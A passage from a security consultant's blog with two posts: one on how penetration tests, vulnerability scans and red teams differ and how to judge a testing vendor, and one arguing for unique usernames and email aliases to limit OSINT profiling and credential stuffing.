Some Definitions


Since I mentioned penetration testing, let's go there.  A question I often get, as I imagine most of you readers do as well, is, "What is the difference between a penetration test and a vulnerability scan?".  Don't feel bad asking this if you don't know, because sadly, many sales and technical people offering theses services don't seem to know this either.  There's also red teaming.  It's important to know what you're getting for your money but even more critical when dealing with PCI, because a vulnerability scan won't fulfill the council's requirements and could leave you failing compliance.

I'm probably going to over-simplify this definition for many, but simply put, a vulnerability scan is a passive or active scan of hosts and services to identify vulnerabilities and their severity, impact, and risk to the organization.  There is a lot of value in a vulnerability scan, as it helps you proactively identify and resolve potential patching deficiencies and configuration issues before an attacker may.  It also compliments your patch management process to ensure patches aren't being missed.  However, this by itself, it not a pentest.

A traditional network penetration test (pentest) is the act of exploiting or validating these vulnerabilities with the intent to demonstrate the impact to the organization.  Other tools and techniques can be used to simulate what an attacker may do, going further than just a single scan.  It's worth noting that both vulnerability scans and penetration tests may or may not include web applications.  Some focus on web applications specifically, often referred to as a "Web Application Pentest" or an "Application Security Test".

Lastly, a red team is essentially a penetration test but with the intent of simulating an attacker targeting the environment directly.  This is often done in an opsec friendly way to "stay under the radar" and avoid detection from defensive teams and technologies.  There's also more reconnaissance up front since the scope and access to the environment isn't likely to be provided by the customer.

Rant


Now we should all know at a high level what the differences are between these services.  However, you'll see that not all pentests are created equal.  If you're looking at penetration testing quotes keep in mind that you're most likely not comparing apples to apples, so going with the most affordable doesn't necessarily mean it will satisfy all of your requirements.  Now, if you're looking to "check a box" to meet compliance regulatory requirements or to satisfy your customer requests, you may be okay with a basic "out of the box" assessment.  Keep in mind that there are firms (I've seen the service contracts) that offer a vulnerability assessment but call it a penetration test in order to offer competitive pricing, I can only assume.  If you come across one of them, please point them to this blog. 😉

Sampling


Something I came across recently was an outsourced pentest that had already been sold.  It's not uncommon to find a limited scope, with the intent to do a sampling of assets in the environment for budget or time constraints.  I have my own opinion about sampling when it comes to penetration testing (don't do it!).  Essentially an attacker will often find the easiest path in, the weakest link.  If you miss it because you didn't look at everything at least once, you're not doing yourself any favors.  This particular SOW stated that about 5% of the environment would be tested every quarter, for a year.  This included vulnerability scans as well, with the same scope.  

I understand wanting to limit the cost, but in this situation it would be better to take that same investment and put it towards a vulnerability scan for the ENTIRE environment, then focus the penetration testing on critical assets and the highest severity findings from the vulnerability assessment.  If it can only be done twice a year for the pentest, that's better than four very limited tests.  The way this was set up, they'll never have a complete picture of their environment at any one point in time.  Had I been involved from the beginning or this was Pondurance offering the service, I would have made these suggestions to the customer in a pre-sales conversation.

Frequency of Testing


I just touched on it in the last paragraph, but the frequency of testing can play a role in the thoroughness and efficiency of an assessment.  It is commonly recommended to perform a penetration test about twice a year.  This is due to the dynamic nature of enterprise environments and the frequency of security vulnerabilities that are introduced into any system.  How much is too much though?  I'd rather see a comprehensive penetration test once a year than two or even four "budget" pentests.  Attackers are financially motivated and if targeting a specific organization, time is often not a constraint for them.  Consultants on the other hand, are.  A good penetration tester will make the best use of their time, manually digging and looking for unique opportunities to move laterally and compromise credentials and hosts along the way.

If you decide you do want frequent tests, make sure you're not being over-charged either.  The first assessment should have more time allocated to it with subsequent ones benefiting from familiarity and experience with the environment gained.

Maturity / Security Posture


Another common gotcha I see is when a customer or the sales person tries to put the proverbial cart before the horse.  You can't run before you can walk.. I'll spare you the rest. 😃  Sometimes I wonder what my own sales team thinks when I'm in a scoping meeting and I'm actively reducing the scope of our services.  Fortunately, my team at Pondurance is as passionate as I am about helping our customers so they've always been cool (at least in person!) about my stepping in and altering course.  Many customers bring this on themselves, assuming the best place to start in their security journey is to go all out and do a red team assessment.  

I often offer a lower cost but more effective first step, such as a security architecture review (gap analysis) or perhaps a vulnerability management program.  Similarly, we offer a penetration test with every vulnerability management program offering.  Many customers initially want the pentest first, followed by monthly external scans and quarterly internal scans.  I always push back on this and instead, suggest we do the pentest at the end of the assessment.  What value is there in an easy pentest, demonstrating the environment is full of holes?  It's like shooting fish in a barrel, an easy win for the tester.  Wouldn't there be so much more value in waiting a year while the customer receives their scan results and work on remediation throughout that time?  Then, when they feel they've done everything they can to protect themselves we test that defense by simulating a real-world attack.


Things to Look For


Pre-Engagement Red Flags


One of the earliest indicators when assessing a new partner for security assessments is the questionnaire.  This is the document, or form, that the sales representative uses to help scope the engagement appropriately.  This document should be pretty telling for how and where they put their emphasis on time.  While true that a number of IP addresses or URLs help provide a baseline estimate for determining how much time an assessment may take, there should be follow-up qualifying questions to gain more context around those.  How are those accessible?  Does a /24 subnet REALLY have all 254 IP addresses in use, or are you paying too much when there are just a handful of hosts within that?

Are they simply quoting you for everything you ask for or are they wanting to discuss what your end goals are with you in order to better serve your needs?  This also shouldn't be a meeting to throw more stuff at you, but rather a conversation about the bigger picture to ensure the right services can be offered.  This can result in a reduction in scope, as I mentioned above.  If it's right for the customer, it should be right for the firm.


Ask about testing methodologies and frameworks.  Does their testing include Manual testing?  Are they following a standard process such as the Penetration Testing Execution Standard (PTES)?  Is there a Quality Assurance component for both the technical work as well as the deliverable?  What does the deliverable look like?  Can you see a redacted version?  Are their reports actionable with clear recommendations and not just a regurgitation of all of the issues you'll be facing in your copy?

Lastly, and probably most obvious, is the Statement of Work (SOW).  Does this contract clearly define the testing process and expected deliverable formats?  Does it specify the project management component?  Exactly how much time is dedicated to manual testing vs automated scanning.  Are they charging time for tools to run?  Are compliance tests called out for their specific requirements?  Is retesting something you're expecting and is it a separate line item?  What are their data retention periods?  There have been some big security vendors in the news recently for breaches that resulted in sensitive client data being exposed.  *cough* Hacking Team *cough*

Engagement Red Flags


Once the engagement is sold and there's a kickoff meeting to discuss expectations around timing, the testing process, and delivery, do you discuss these things in detail?  Are the rules of engagement specifically called out and discussed in depth?  

Something I've found from my experience as a Systems Administrator and being on the receiving end of a penetration test, is that you may have certain expectations for findings.  For example, I was at an organization where we had certain service accounts we knew needed to be transitioned, as well as some unsupported operating systems we had scheduled to retire.  I specifically looked for these results on the penetration test report as a quick sanity check to make sure they were at least finding the low hanging fruit.

Ironically, as a tester I'm always concerned the client is doing the same to me, and they should!  It's a great way to check my work and it's a challenge to make sure I try to find everything I can.  No pentester can ever find everything, but again, the low hanging fruit should be discovered and exploited if possible.  I wonder how many of our customers have had honeypots and I just didn't know it. 😅  Although this could be seen as a waste of time, it's yet another way to measure the effectiveness of your red team.  I've also been pitted against a blue team SOC and blacklisting security devices, which made me really think carefully about how I was going to do my passive information gathering and fly under the radar.  Now we get into purple-team operations where we can test the effectiveness of both teams and use the results as a training opportunity for each!

Post-Engagement Red Flags for Future Consideration


It may be difficult to determine the quality of the test based on the results alone.  After all, the clients aren't typically as technical in the same areas as the company providing the testing services.  However, the quality of the report should be obvious.  Do they do a good job of breaking down the main issues in a prioritized, easy to understand executive summary?  Does the report also give enough technical detail so that the responding IT department can resolve the issues being addressed?  

Does their deliverable contain screenshots as evidence of the exploited vulnerabilities and are they effective in demonstrating the risk posed by them?  Are there other supporting data files from tool outputs, such as vulnerability scan dumps, tool state files, and raw stdout?  Are they willing to share a list of all of the tools that were used during the assessment?  Part of the value in the assessment may be the education of tools and processes which can be used in internal training.  A big part of what I do in Dynamic Application Security Assessments is to provide Burp Suite Professional project state files so that the developers can load the findings into their own tools and replay the payloads to verify that their findings were resolved on their own.  I've even had the sales team in some instances add in an ad-hoc training opportunity for an entire team, tacked on to the end of the review meetings.

Speaking of review meetings, this in my opinion, is the most valuable part of the engagement for the customer.  This should be offered a week or two after the results are provided, to allow time for the customer to digest and form questions.  Are they conducting these as personally as possible?  These should be done face to face, when feasible, and should be an open-floor presentation style to allow for healthy back-and-forth dialogue.  It's an opportunity to really utilize those advisory resources that the consultancy has to offer by asking questions and making sure everyone's on the same page in regards to remediation, etc.  Lastly, is the project closed immediately after the review meeting and the invoice is paid, or do they offer to answer lingering questions afterwards?  I always personally offer this, knowing there may not be time available in the budget to charge to because I see the value in helping customers who in all likelihood, won't get around to resolving the huge list of issues you dumped into their laps until after the project is finished.

Conclusion


This is by no means a comprehensive list of things to do and look for when shopping for or offering security services.  These are just a few things I see regularly and since I have a passion for making sure people get the most "bang for their buck", I wanted to share with the community as well.  I think we can all do a better job as the technical delivery and sales teams to meet our customer's needs, and I strongly believe developing that quality reputation goes a long way in the overall success of the business.  A lot of that comes down to communication up front, and not assuming our customers know what's best for themselves.  We need to listen to them if they want something specific, but they're also hiring us to be their trusted advisors.

Please share any other thoughts and ideas!  I'd love to hear how people are testing their testers.  😄

- Curtis Brazzell






May 01, 2019

OSINT Recon Great? - Unique Usernames Are Better Than Unique Passwords

Using Blur to Create Unique Emails/Usernames

Intro


Happy World Password Day! Yes, this is an opinion piece. No, I’m not saying passwords are unimportant. The title is meant to be bold to encourage debate and to bring awareness to the topic. If anything, I believe they’re equally important as passwords when it comes to privacy and security. This is something I’ve been practicing personally now for ten years and it has worked well for me. Please hear me out and wait to tell me how wrong I am until after you’ve read the entire article. 😛 Passwords have been over-talked in the information security space to, quite literally, the brink of extinction. We still have to live in a world where credentials are the primary form of authentication online, for now. Big steps are being taken to get rid of the need for passwords but they’re here to stay for a while. Sorry passwords, I know today is your day.

Credentials are typically comprised of an email address or username, a password, and ideally, another form of identification such as a security token or push notification known as Two-Factor Authentication (2FA).  So why then are we always talking about passwords and 2FA?  We almost never talk about usernames and in my opinion, they're just as important in a security context if not more-so than their notorious counterpart.  They're like the R2D2 of authentication when C3PO always gets the gold!  (Auth-2D2)

Please understand me, I'm certainly not advocating we use weak passwords just that the importance of usernames is often overlooked.

R2 Authenticating Into Jabba's Palace

Now that your eyes have returned to their normal, non-rolled position, let's talk about why I feel this way.  Hint: It's OSINT

Reasoning


I've previously spoken about Open-Source Intelligence (OSINT) tools and the reconnaissance phase in my Phishing article so I'll do my best to avoid any redundancies there.  A lot of those tools are designed to target a company or a domain first and then find information on individuals associated it.  However, sometimes an attacker may be targeting an individual instead of an organization from the start.  Popular targets in the real world are usually victims who may have personal connections to the attacker or are high profile people such as celebrities or politicians.  The technical goal of the attacker may be to gain unauthorized access to resources as that individual or to violate their privacy by discovering browsing habits and sites they belong to.  The end goal could be to humiliate and expose their victim or to financially profit from this access.  I'll admit in my past I had to put the grey-hat back on and dig up a LinkedIn breach hash, crack it, and use Facebook to SSO into other accounts in order to geo-locate an IP address for someone in the family who had gone missing.  We were concerned for their safety, truly.


By now, just about everyone who uses the Internet knows that strong passwords are a better idea than using "123456" for their Chase account's password.  This has been a long, brutal learning lesson and some people are still getting caught up to speed.  A newer but still relatively old concept in security is to use unique passwords that are different for each site you have an account on.  This is great, as long as it's done properly.  Using a password manager instead of 20 post-it notes on your desk is the preferred way to do this, in case you were wondering.  (I, like many others before me, have seen this in physical penetration testing engagements!)  If this is you, crumble them up after converting them to a password vault like KeePass, 1Password, LastPass, etc and throw them in the shredder.  For the rest of you, great job on keeping your passwords safe and unique!


Great!  Now that all of us have a different set of credentials on every site we belong to, let's talk about why it's important to do this.  I'll keep it brief because it's not a new concept but I feel it's worth explaining due to the importance of the topic.  "Credential Stuffing" is a term used when an attacker gains access to a list of usernames and passwords, typically through a breach leak, and attempts to match these up against other sites and services to see if people are using password reuse.  Not us!  However, many people do and these attackers have tools such as Snipr which can pretty quickly and effectively check what other sites those credentials work on.  Sites such as haveibeenpwned.com allow users to check if and even be alerted in the event that their accounts have been compromised.  If someone is targeting you specifically, the same technique applies except they won't be looking for any connect to be letting them in, they'll be using your leaked password.

HIBP Breach Leak Lookup by Email

Someone using a credential stuffing tool or a number of OSINT tools can still learn a lot of information about you if they're trying to build an online profile of their target.  Think about it, your email address or username is likely to be the same on every website you are registered with.  After all, the username just identifies you.  It's your password that verifies your authenticity, or is supposed to, and says you are who you say you are.  Would you care if all of the sites you're registered on were publicly searchable by anyone who wanted to look into your life?  People could build a pretty good profile of you such as if you go to church, where you bank, what hobbies you have, groups you belong to, social media accounts, etc.  Maybe you don't want that all out there?  The Internet is not forgiving after all, it archives a mind-boggling amount and has an almost infinite retention period.  Just Google your email address and see what pops up and that's just what a non-attacker would use to dive into your story.  The recent Ashley Madison scandal comes to mind and the people who were "outed" because they didn't expect a Cyber Security breach to give them away.  Having complex passwords didn't help them.  It's not that I'm condoning this service, but I believe in privacy for all.  Why not create "throwaways" for every site you belong to?

Usernames and email addresses aren't necessarily synonymous.  Maybe I want my username to be publicly known for a social media account.  For example, my Twitter username is @CurtBraz.  Anyone knows that and I don't want to mask my identify there.  That's a risk I choose.  However, I still have a uniquely masked email address that's required for me to log in, in addition to a strong and unique password.  If someone tries to brute force my password they would need to know my email address, which shouldn't be accessible in most cases.  Even if someone got this for some reason and they wanted to get into my email account, they have no idea what my underlying real email is.

If my password wasn't unique and was re-used you'd still run into the same problem as an attacker.  If you were staring at a breach list of credentials you might have my password for Twitter, but you couldn't use that anywhere else I have an account even if it's the same password I use everywhere.  This is the point I hope to make.

Snipr Config Hits

Recommendations and Conclusion


So what can we do to protect our privacy?  Something we always preach from an Application Security perspective is that sites should not disclose if a username exists if a password is incorrect or a reset request is initiated.  Instead, it should respond with a generic message like, "This username or password combination does not match any known records".  That being said, a lot of popular sites don't follow this practice.  Captcha isn't foolproof, but is another deterrent against bots or scripts attempting to automate these attacks.  For any developers or site administrators reading this, you can help your users by following these simple practices.  Additionally, content from forums and discussion threads are spidered and indexed by search engines and can pick up users this way as well.

This advice is for everyone else who's a "user".  Consider using unique, unidentifiable usernames and email addresses when registering online.  Some people take it even further, depending on your level of privacy needs, and "mask" other information such as credit cards, names, and physical addresses.   For the purpose of this blog I'm only referring to usernames and emails.  Even if your password is disclosed in a breach and you are an avid password reuser, no one will know which account is yours to try the password against.  Of course they could still do a dictionary attack and force their way in eventually, so that's why it's good to follow both practices.  Also, a unique email or username as opposed to only a unique password makes it extremely difficult to target you as having an account on that site.  If I were to take your one known email address and run it through an OSINT tool, I would only find that one site you belong to.  I wouldn't get a pretty visual map like I do in Maltego to know what other services I can try my leaked credentials out on.

Maltego Example of User Recon

I personally use a browser plugin called "Blur" (formerly known as Do Not Track) which does an awesome job of integrating into Chrome form fields and offering to "mask my email".  See the image at the top of this article for an example of creating a new account on AWS.  I use the same format for usernames.  I then leverage KeePass for unique passwords but you can use any password manager you like.. even Blur or your browser itself.  Most password managers will reference the HIBP API and make sure your passwords themselves haven't been in a breach thus far.  This allows me to quickly and easily create throwaway emails that I can use for authentication but it can also protect my real email.  As a plus, it has the additional benefit of effectively cutting off unwanted spam by turning off the forwarding service and blocking trackers.  There are other services you can use for disposable email address and username generation, such as Guerrella Mail.  Even Gmail allows you to create email aliases by simply adding a plus sign.  If your email address is curtis.brazzell@gmail.com, you can create one on-the-fly at a cash register in a store such as curtis.brazzell+gamestop@gmail.com and your emails will still be delivered.  What you've effectively done is create a unique account that hackers will not easily recognize as yours in a breach list but at the same time it's recognizable to you.  You can also determine what sources are sharing your address with third parties this way!  Of course, someone could figure out your naming convention, so you may want something more random.

My KeePass Database 
(Now I'll Have to Change it Again) 😋


Guerrilla Mail Disposable Emails 
(Shark Lasers is a Freaking Awesome Domain, BTW)


Blocked Blur Email


With the advent of open and centralized authentication services like oauth and auth0, things are changing a bit.  There's still a balance in my mind for using these services.  On one hand all of your memberships are tied into one or a few services (Facebook, Twitter, Google, etc) and as long as that account is secure, your others should be as well.  Registering this way is one less username and password you have to deal with.  On the other hand, you're putting all of your eggs in one basket when you think about account takeover and you're using the same username everywhere.  There's always the potential that organization could be breached itself, even Google!  My personal approach is to mix it up some and use Single Sign On (SSO) for less important resources and for more private ones I register directly with the site.

Because a unique email makes it difficult for an attacker to brute force my account in much the same way a password does and because it also has the added benefit of making it difficult to target or identify me, I think it's just as important if not more-so than having a uniquely strong password.  It's a form of security by obscurity.  Again, both are recommended, but I think unique and complex usernames should be a standard, something I rarely see today.  Security is all about layering, and although I know security by obscurity isn't the solution, it's yet another layer to strengthen your security posture if used properly.

As always, I encourage a discussion and healthy debate on the topic.  Please let me know why you do or don't agree!  I do these blogs to help the community but also to advance my own understanding by hearing from you knowledgeable readers!  Thanks so much!

- Curtis Brazzell